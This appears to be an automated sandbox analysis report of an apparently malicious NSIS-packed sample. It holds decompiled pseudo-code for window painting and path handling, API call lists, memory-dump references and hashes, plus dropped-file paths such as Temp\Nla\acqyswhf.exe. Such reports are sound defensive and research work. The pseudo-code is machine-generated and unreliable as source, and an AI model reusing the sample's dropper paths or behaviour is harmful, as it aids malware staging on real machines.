                                                                                                                                                                                                              						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                                                              						_a16 = _t87;
                                                                                                                                                                                                              						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                                                              						DeleteObject(_a16);
                                                                                                                                                                                                              						_v32.top = _v32.top + 4;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                                                                                                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                                                                                                              						_a16 = _t94;
                                                                                                                                                                                                              						if(_t94 != 0) {
                                                                                                                                                                                                              							_t128 = _a8;
                                                                                                                                                                                                              							_v32.left = 0x10;
                                                                                                                                                                                                              							_v32.top = 8;
                                                                                                                                                                                                              							SetBkMode(_t128, 1);
                                                                                                                                                                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                                                                                                              							_a8 = SelectObject(_t128, _a16);
                                                                                                                                                                                                              							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
                                                                                                                                                                                                              							SelectObject(_t128, _a8);
                                                                                                                                                                                                              							DeleteObject(_a16);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					EndPaint(_a4,  &_v96);
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t102 = _a16;
                                                                                                                                                                                                              				if(_a8 == 0x46) {
                                                                                                                                                                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                                                                                                              					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                                                                                                              			}













                                                                                                                                                                                                              0x0040100a
                                                                                                                                                                                                              0x00401039
                                                                                                                                                                                                              0x00401047
                                                                                                                                                                                                              0x0040104d
                                                                                                                                                                                                              0x00401051
                                                                                                                                                                                                              0x0040105b
                                                                                                                                                                                                              0x00401061
                                                                                                                                                                                                              0x00401064
                                                                                                                                                                                                              0x004010f3
                                                                                                                                                                                                              0x00401089
                                                                                                                                                                                                              0x0040108c
                                                                                                                                                                                                              0x004010a6
                                                                                                                                                                                                              0x004010bd
                                                                                                                                                                                                              0x004010cc
                                                                                                                                                                                                              0x004010cf
                                                                                                                                                                                                              0x004010d5
                                                                                                                                                                                                              0x004010d9
                                                                                                                                                                                                              0x004010e4
                                                                                                                                                                                                              0x004010ed
                                                                                                                                                                                                              0x004010ef
                                                                                                                                                                                                              0x004010ef
                                                                                                                                                                                                              0x00401100
                                                                                                                                                                                                              0x00401105
                                                                                                                                                                                                              0x0040110d
                                                                                                                                                                                                              0x00401110
                                                                                                                                                                                                              0x00401112
                                                                                                                                                                                                              0x00401118
                                                                                                                                                                                                              0x0040111f
                                                                                                                                                                                                              0x00401126
                                                                                                                                                                                                              0x00401130
                                                                                                                                                                                                              0x00401142
                                                                                                                                                                                                              0x00401156
                                                                                                                                                                                                              0x00401160
                                                                                                                                                                                                              0x00401165
                                                                                                                                                                                                              0x00401165
                                                                                                                                                                                                              0x00401110
                                                                                                                                                                                                              0x0040116e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401178
                                                                                                                                                                                                              0x00401010
                                                                                                                                                                                                              0x00401013
                                                                                                                                                                                                              0x00401015
                                                                                                                                                                                                              0x0040101f
                                                                                                                                                                                                              0x0040101f
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                              • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                              • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                                                                                                                                                                              • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                              			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                                                                              				struct _ITEMIDLIST* _v8;
                                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				signed char _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				signed char _v28;
                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                              				CHAR* _t39;
                                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                                              				char _t52;
                                                                                                                                                                                                              				char _t53;
                                                                                                                                                                                                              				char _t55;
                                                                                                                                                                                                              				char _t57;
                                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                                              				char* _t66;
                                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                                              				char _t88;
                                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                              				void* _t92;
                                                                                                                                                                                                              				signed int _t97;
                                                                                                                                                                                                              				signed int _t99;
                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t92 = __esi;
                                                                                                                                                                                                              				_t89 = __edi;
                                                                                                                                                                                                              				_t65 = __ebx;
                                                                                                                                                                                                              				_t38 = _a8;
                                                                                                                                                                                                              				if(_t38 < 0) {
                                                                                                                                                                                                              					_t86 =  *0x423f1c; // 0x2d134b
                                                                                                                                                                                                              					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push(_t65);
                                                                                                                                                                                                              				_push(_t92);
                                                                                                                                                                                                              				_push(_t89);
                                                                                                                                                                                                              				_t66 = _t38 +  *0x424798;
                                                                                                                                                                                                              				_t39 = 0x4236e0;
                                                                                                                                                                                                              				_t90 = 0x4236e0;
                                                                                                                                                                                                              				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
                                                                                                                                                                                                              					_t90 = _a4;
                                                                                                                                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t88 =  *_t66;
                                                                                                                                                                                                              					if(_t88 == 0) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t90 - _t39 - 0x400;
                                                                                                                                                                                                              					if(_t90 - _t39 >= 0x400) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t66 = _t66 + 1;
                                                                                                                                                                                                              					__eflags = _t88 - 4;
                                                                                                                                                                                                              					_a8 = _t66;
                                                                                                                                                                                                              					if(__eflags >= 0) {
                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                              							 *_t90 = _t88;
                                                                                                                                                                                                              							_t90 =  &(_t90[1]);
                                                                                                                                                                                                              							__eflags = _t90;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *_t90 =  *_t66;
                                                                                                                                                                                                              							_t90 =  &(_t90[1]);
                                                                                                                                                                                                              							_t66 = _t66 + 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t41 =  *((char*)(_t66 + 1));
                                                                                                                                                                                                              					_t80 =  *_t66;
                                                                                                                                                                                                              					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                                                                                                                                              					_v24 = _t80;
                                                                                                                                                                                                              					_v28 = _t80 | 0x00000080;
                                                                                                                                                                                                              					_v16 = _t41;
                                                                                                                                                                                                              					_v20 = _t41 | 0x00000080;
                                                                                                                                                                                                              					_t66 = _a8 + 2;
                                                                                                                                                                                                              					__eflags = _t88 - 2;
                                                                                                                                                                                                              					if(_t88 != 2) {
                                                                                                                                                                                                              						__eflags = _t88 - 3;
                                                                                                                                                                                                              						if(_t88 != 3) {
                                                                                                                                                                                                              							__eflags = _t88 - 1;
                                                                                                                                                                                                              							if(_t88 == 1) {
                                                                                                                                                                                                              								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                                                                                                                                              								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L42:
                                                                                                                                                                                                              							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                                                                                                                                              							_t39 = 0x4236e0;
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _t97 - 0x1d;
                                                                                                                                                                                                              						if(_t97 != 0x1d) {
                                                                                                                                                                                                              							__eflags = (_t97 << 0xa) + 0x425000;
                                                                                                                                                                                                              							E00406228(_t90, (_t97 << 0xa) + 0x425000);
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00406186(_t90,  *0x424748);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _t97 + 0xffffffeb - 7;
                                                                                                                                                                                                              						if(_t97 + 0xffffffeb < 7) {
                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                              							E00406503(_t90);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L42;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t52 =  *0x42474c;
                                                                                                                                                                                                              					__eflags = _t52;
                                                                                                                                                                                                              					_t99 = 2;
                                                                                                                                                                                                              					if(_t52 >= 0) {
                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                              						_a8 = 1;
                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                              						__eflags =  *0x4247e4;
                                                                                                                                                                                                              						if( *0x4247e4 != 0) {
                                                                                                                                                                                                              							_t99 = 4;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _t80;
                                                                                                                                                                                                              						if(__eflags >= 0) {
                                                                                                                                                                                                              							__eflags = _t80 - 0x25;
                                                                                                                                                                                                              							if(_t80 != 0x25) {
                                                                                                                                                                                                              								__eflags = _t80 - 0x24;
                                                                                                                                                                                                              								if(_t80 == 0x24) {
                                                                                                                                                                                                              									GetWindowsDirectoryA(_t90, 0x400);
                                                                                                                                                                                                              									_t99 = 0;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									__eflags = _t99;
                                                                                                                                                                                                              									if(_t99 == 0) {
                                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t53 =  *0x424744;
                                                                                                                                                                                                              									_t99 = _t99 - 1;
                                                                                                                                                                                                              									__eflags = _t53;
                                                                                                                                                                                                              									if(_t53 == 0) {
                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                              										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                                                                                                                                              										__eflags = _t55;
                                                                                                                                                                                                              										if(_t55 != 0) {
                                                                                                                                                                                                              											L28:
                                                                                                                                                                                                              											 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                                                                                              											__eflags =  *_t90;
                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                                                                                                                                              										_v12 = _t55;
                                                                                                                                                                                                              										__imp__CoTaskMemFree(_v8);
                                                                                                                                                                                                              										__eflags = _v12;
                                                                                                                                                                                                              										if(_v12 != 0) {
                                                                                                                                                                                                              											goto L30;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L28;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = _a8;
                                                                                                                                                                                                              									if(_a8 == 0) {
                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                                                                                                                                              									__eflags = _t57;
                                                                                                                                                                                                              									if(_t57 == 0) {
                                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									goto L26;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							GetSystemDirectoryA(_t90, 0x400);
                                                                                                                                                                                                              							goto L30;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
                                                                                                                                                                                                              							__eflags =  *_t90;
                                                                                                                                                                                                              							if( *_t90 != 0) {
                                                                                                                                                                                                              								L31:
                                                                                                                                                                                                              								__eflags = _v16 - 0x1a;
                                                                                                                                                                                                              								if(_v16 == 0x1a) {
                                                                                                                                                                                                              									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E004062BB(_t66, _t90, _t99, _t90, _v16);
                                                                                                                                                                                                              							L30:
                                                                                                                                                                                                              							__eflags =  *_t90;
                                                                                                                                                                                                              							if( *_t90 == 0) {
                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L31;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t52 - 0x5a04;
                                                                                                                                                                                                              					if(_t52 == 0x5a04) {
                                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _v16 - 0x23;
                                                                                                                                                                                                              					if(_v16 == 0x23) {
                                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _v16 - 0x2e;
                                                                                                                                                                                                              					if(_v16 == 0x2e) {
                                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                                                                              					return _t39;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return E00406228(_a4, _t39);
                                                                                                                                                                                                              			}



























                                                                                                                                                                                                              0x004062bb
                                                                                                                                                                                                              0x004062bb
                                                                                                                                                                                                              0x004062bb
                                                                                                                                                                                                              0x004062c1
                                                                                                                                                                                                              0x004062c6
                                                                                                                                                                                                              0x004062c8
                                                                                                                                                                                                              0x004062d7
                                                                                                                                                                                                              0x004062d7
                                                                                                                                                                                                              0x004062df
                                                                                                                                                                                                              0x004062e0
                                                                                                                                                                                                              0x004062e1
                                                                                                                                                                                                              0x004062e2
                                                                                                                                                                                                              0x004062e5
                                                                                                                                                                                                              0x004062ed
                                                                                                                                                                                                              0x004062ef
                                                                                                                                                                                                              0x00406306
                                                                                                                                                                                                              0x00406309
                                                                                                                                                                                                              0x00406309
                                                                                                                                                                                                              0x004064e0
                                                                                                                                                                                                              0x004064e0
                                                                                                                                                                                                              0x004064e4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406316
                                                                                                                                                                                                              0x0040631c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406322
                                                                                                                                                                                                              0x00406323
                                                                                                                                                                                                              0x00406326
                                                                                                                                                                                                              0x00406329
                                                                                                                                                                                                              0x004064d3
                                                                                                                                                                                                              0x004064dd
                                                                                                                                                                                                              0x004064df
                                                                                                                                                                                                              0x004064df
                                                                                                                                                                                                              0x004064d5
                                                                                                                                                                                                              0x004064d7
                                                                                                                                                                                                              0x004064d9
                                                                                                                                                                                                              0x004064da
                                                                                                                                                                                                              0x004064da
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004064d3
                                                                                                                                                                                                              0x0040632f
                                                                                                                                                                                                              0x00406333
                                                                                                                                                                                                              0x00406343
                                                                                                                                                                                                              0x0040634a
                                                                                                                                                                                                              0x0040634d
                                                                                                                                                                                                              0x00406355
                                                                                                                                                                                                              0x00406358
                                                                                                                                                                                                              0x0040635f
                                                                                                                                                                                                              0x00406360
                                                                                                                                                                                                              0x00406363
                                                                                                                                                                                                              0x00406480
                                                                                                                                                                                                              0x00406483
                                                                                                                                                                                                              0x004064b3
                                                                                                                                                                                                              0x004064b6
                                                                                                                                                                                                              0x004064bb
                                                                                                                                                                                                              0x004064bf
                                                                                                                                                                                                              0x004064bf
                                                                                                                                                                                                              0x004064c4
                                                                                                                                                                                                              0x004064ca
                                                                                                                                                                                                              0x004064cc
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004064cc
                                                                                                                                                                                                              0x00406485
                                                                                                                                                                                                              0x00406488
                                                                                                                                                                                                              0x0040649d
                                                                                                                                                                                                              0x004064a4
                                                                                                                                                                                                              0x0040648a
                                                                                                                                                                                                              0x00406491
                                                                                                                                                                                                              0x00406491
                                                                                                                                                                                                              0x004064ac
                                                                                                                                                                                                              0x004064af
                                                                                                                                                                                                              0x00406478
                                                                                                                                                                                                              0x00406479
                                                                                                                                                                                                              0x00406479
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004064af
                                                                                                                                                                                                              0x00406369
                                                                                                                                                                                                              0x00406370
                                                                                                                                                                                                              0x00406372
                                                                                                                                                                                                              0x00406373
                                                                                                                                                                                                              0x0040638d
                                                                                                                                                                                                              0x0040638d
                                                                                                                                                                                                              0x00406394
                                                                                                                                                                                                              0x00406394
                                                                                                                                                                                                              0x0040639b
                                                                                                                                                                                                              0x0040639f
                                                                                                                                                                                                              0x0040639f
                                                                                                                                                                                                              0x004063a0
                                                                                                                                                                                                              0x004063a2
                                                                                                                                                                                                              0x004063db
                                                                                                                                                                                                              0x004063de
                                                                                                                                                                                                              0x004063ee
                                                                                                                                                                                                              0x004063f1
                                                                                                                                                                                                              0x004063f9
                                                                                                                                                                                                              0x004063ff
                                                                                                                                                                                                              0x004063ff
                                                                                                                                                                                                              0x0040645e
                                                                                                                                                                                                              0x0040645e
                                                                                                                                                                                                              0x00406460
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406403
                                                                                                                                                                                                              0x0040640a
                                                                                                                                                                                                              0x0040640b
                                                                                                                                                                                                              0x0040640d
                                                                                                                                                                                                              0x00406427
                                                                                                                                                                                                              0x00406435
                                                                                                                                                                                                              0x0040643b
                                                                                                                                                                                                              0x0040643d
                                                                                                                                                                                                              0x0040645b
                                                                                                                                                                                                              0x0040645b
                                                                                                                                                                                                              0x0040645b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040645b
                                                                                                                                                                                                              0x00406443
                                                                                                                                                                                                              0x0040644c
                                                                                                                                                                                                              0x0040644f
                                                                                                                                                                                                              0x00406455
                                                                                                                                                                                                              0x00406459
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406459
                                                                                                                                                                                                              0x0040640f
                                                                                                                                                                                                              0x00406412
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406421
                                                                                                                                                                                                              0x00406423
                                                                                                                                                                                                              0x00406425
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406425
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040645e
                                                                                                                                                                                                              0x004063e6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004063a4
                                                                                                                                                                                                              0x004063bf
                                                                                                                                                                                                              0x004063c4
                                                                                                                                                                                                              0x004063c7
                                                                                                                                                                                                              0x00406467
                                                                                                                                                                                                              0x00406467
                                                                                                                                                                                                              0x0040646b
                                                                                                                                                                                                              0x00406473
                                                                                                                                                                                                              0x00406473
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040646b
                                                                                                                                                                                                              0x004063d1
                                                                                                                                                                                                              0x00406462
                                                                                                                                                                                                              0x00406462
                                                                                                                                                                                                              0x00406465
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406465
                                                                                                                                                                                                              0x004063a2
                                                                                                                                                                                                              0x00406375
                                                                                                                                                                                                              0x00406379
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040637b
                                                                                                                                                                                                              0x0040637f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406381
                                                                                                                                                                                                              0x00406385
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406387
                                                                                                                                                                                                              0x00406387
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406387
                                                                                                                                                                                                              0x00406385
                                                                                                                                                                                                              0x004064ea
                                                                                                                                                                                                              0x004064f4
                                                                                                                                                                                                              0x00406500
                                                                                                                                                                                                              0x00406500
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000400), ref: 004063E6
                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?), ref: 00406435
                                                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p), ref: 00406443
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 717251189-3886470532
                                                                                                                                                                                                              • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                                                                                                                                                                              • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00406503(CHAR* _a4) {
                                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                                              				char _t7;
                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                              				CHAR* _t17;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                                                                              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                                                                                                              					_t17 =  &(_t17[4]);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
                                                                                                                                                                                                              					_t17 =  &(_t17[2]);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t5 =  *_t17;
                                                                                                                                                                                                              				_t15 = _t17;
                                                                                                                                                                                                              				_t16 = _t17;
                                                                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                                                                              					do {
                                                                                                                                                                                                              						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
                                                                                                                                                                                                              							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t17 = CharNextA(_t17);
                                                                                                                                                                                                              						_t5 =  *_t17;
                                                                                                                                                                                                              					} while (_t5 != 0);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                                                                                              					_t7 =  *_t16;
                                                                                                                                                                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                                                              					if(_t15 < _t16) {
                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					break;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x00406505
                                                                                                                                                                                                              0x0040650d
